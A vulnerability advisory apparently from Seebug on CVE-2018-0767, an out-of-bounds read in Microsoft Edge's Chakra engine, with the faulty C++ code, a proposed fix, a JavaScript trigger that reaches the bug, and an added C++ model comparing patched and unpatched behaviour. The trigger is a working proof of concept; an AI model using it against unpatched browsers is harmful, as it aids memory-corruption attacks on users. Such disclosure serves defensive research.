Microsoft Edge: Chakra: OOB read in AppendLeftOverItemsFromEndSegment(CVE-2018-0767)

2018-01-22T00:00:00
ID SSV:97092
Type seebug
Reporter Root
Modified 2018-01-22T00:00:00

Description

Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.

```cpp
growby = endSeg->length;
current = current->GrowByMin(recycler, growby);
CopyArray(current->elements + endIndex + 1, endSeg->length, ((Js::SparseArraySegment<T>*)endSeg)->elements, endSeg->length);
LinkSegments((Js::SparseArraySegment<T>*)startPrev, current);
if (HasNoMissingValues())
{
    if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}
```

In the "ScanForMissingValues" method, it uses "head". But it doesn't check the grown segment "current" is equal to "head" before calling the method. I guess it should be like:

```cpp
if (current == head && HasNoMissingValues())
{
    if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}
```

```js
function trigger() {
    let arr = [1.1];
    let i = 0;
    for (; i < 1000; i += 0.5) {
        arr[i + 0x7777] = 2.0;
    }

    arr[1001] = 35480.0;

    for (; i < 0x7777; i++) {
        arr[i] = 1234.3;
    }
}

for (let i = 0; i < 100; i++) {
    trigger();
}
```
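To make the missing check concrete, here is an added C++ model of the segment chain and flag logic the report describes. It is not Chakra's code: the segment layout, the `scanHead` routine standing in for ScanForMissingValues (assumed to treat its indices as offsets into head's storage), and all sample values are assumptions. It counts how many scan indices land past the end of head when a non-head segment is the one that grows, under the original condition and under the proposed `current == head` condition, and checks that the proposed condition still clears the flag when head itself absorbs a missing item.

```cpp
#include <cmath>
#include <cstdint>
#include <cstdio>
#include <vector>

// Constructed model, not Chakra's code. A JavascriptArray is modelled as a
// chain of sparse segments; the first one is "head". The HasNoMissingValues
// fast-path flag only describes head, so a scan that refreshes it must
// only ever run against head.
struct Segment {
    uint32_t left;                 // array index held in elements[0]
    std::vector<double> elements;  // dense storage; NAN marks a missing item
    Segment* next;
};

struct ModelArray {
    Segment* head = nullptr;
    bool hasNoMissingValues = true;
};

// Outcome of one scan. A real engine has no bounds check here: every index
// past head's storage becomes a read of whatever memory follows it.
struct ScanReport {
    bool foundMissing = false;
    uint32_t outOfBoundsReads = 0;
};

static bool isMissing(double v) { return std::isnan(v); }

// Stand-in for ScanForMissingValues (an assumption about its shape): the
// indices are offsets into head->elements, never into another segment.
static ScanReport scanHead(const ModelArray& a, uint32_t startIndex, uint32_t endIndex) {
    ScanReport r;
    for (uint32_t i = startIndex; i <= endIndex; i++) {
        if (i >= a.head->elements.size()) { r.outOfBoundsReads++; continue; }
        if (isMissing(a.head->elements[i])) r.foundMissing = true;
    }
    return r;
}

// Model of the AppendLeftOverItemsFromEndSegment tail: copy endSeg's items
// onto the end of `current`, unlink endSeg, refresh the flag. `patched`
// selects the condition the report proposes (current == head) instead of
// the original unconditional HasNoMissingValues() test.
static ScanReport appendLeftOverItems(ModelArray& a, Segment* current, Segment* endSeg, bool patched) {
    uint32_t endIndex = static_cast<uint32_t>(current->elements.size()) - 1;
    uint32_t growby = static_cast<uint32_t>(endSeg->elements.size());
    current->elements.insert(current->elements.end(), endSeg->elements.begin(), endSeg->elements.end());
    current->next = endSeg->next;
    ScanReport r;
    bool mayScan = patched ? (current == a.head && a.hasNoMissingValues) : a.hasNoMissingValues;
    if (mayScan) {
        r = scanHead(a, endIndex + 1, endIndex + growby);
        if (r.foundMissing) a.hasNoMissingValues = false;
    }
    return r;
}

// Scenario 1: a short head, a larger non-head segment, and a leftover
// segment after it. Growing the non-head segment must not scan head.
static uint32_t outOfBoundsReadsWhenNonHeadGrows(bool patched) {
    Segment endSeg{103, {6.0, 7.0, 8.0, 9.0, 10.0}, nullptr};
    Segment current{100, {3.0, 4.0, 5.0}, &endSeg};
    Segment head{0, {1.0, 2.0}, &current};
    ModelArray a;
    a.head = &head;
    return appendLeftOverItems(a, &current, &endSeg, patched).outOfBoundsReads;
}

// Scenario 2: head itself grows and absorbs a missing item; the patched
// condition still scans and clears the flag, so the fix loses nothing.
static bool flagClearedWhenHeadGrows() {
    Segment endSeg{2, {3.0, NAN}, nullptr};
    Segment head{0, {1.0, 2.0}, &endSeg};
    ModelArray a;
    a.head = &head;
    appendLeftOverItems(a, &head, &endSeg, true);
    return !a.hasNoMissingValues;
}

int main() {
    std::printf("unpatched: %u reads past head\n", outOfBoundsReadsWhenNonHeadGrows(false));
    std::printf("patched:   %u reads past head\n", outOfBoundsReadsWhenNonHeadGrows(true));
    std::printf("head growth clears flag: %s\n", flagClearedWhenHeadGrows() ? "yes" : "no");
    return 0;
}
```

With the sample layout, the unpatched path scans offsets 3 through 7 of a head that holds two elements, so all five reads fall outside head's storage; the patched path performs no scan for a non-head segment and still detects the NAN when head is the segment that grows.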